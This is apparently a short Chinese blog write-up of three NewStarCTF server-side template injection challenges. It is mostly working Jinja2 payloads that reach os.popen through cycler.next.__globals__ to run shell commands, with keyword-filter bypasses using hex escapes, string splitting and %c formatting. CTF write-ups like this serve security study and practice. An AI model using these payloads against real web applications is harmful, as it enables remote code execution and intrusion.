[NewStarCTF 公开赛赛道]SSTI
[NewStarCTF 公开赛赛道]BabySSTI_One
过滤了常用的那几个关键词,但是并不是很影响我的姿势
1 | {{cycler.next.__globals__.__builtins__.__import__('os').popen('ls /').read()}} |
[NewStarCTF 公开赛赛道]BabySSTI_Two
1 | {%set ls='\\x6c\\x73\\x20\\x2f'%}{{cycler.next['__g''lobals__']['__b''uiltins__'].__import__('os')['p''open'](ls).read()}} |
这个payload
能看懂吧,就是一个16
进制的ascii
绕过,还是能接受的
[NewStarCTF 公开赛赛道]BabySSTI_Three
1 | {{cycler.next['%s%s'%('%s%s'%(('%c'%95)*2,'g''lobals'),('%c'%95)*2)]['%s%s'%('%s%s'%(('%c'%95)*2,'b''uiltins'),('%c'%95)*2)]['%s%s'%('%s%s'%(('%c'%95)*2,'import'),('%c'%95)*2)]('os')['p''open']('\\x6c\\x73\\x20\\x2f').read()}} |
- Title: [NewStarCTF 公开赛赛道]SSTI
- Author: baozongwi
- Created at : 2024-08-25 16:09:17
- Updated at : 2024-10-02 20:21:24
- Link: https://baozongwi.xyz/2024/08/25/NewStarCTF-公开赛赛道-SsTi/
- License: This work is licensed under CC BY-NC-SA 4.0.
推荐阅读
Comments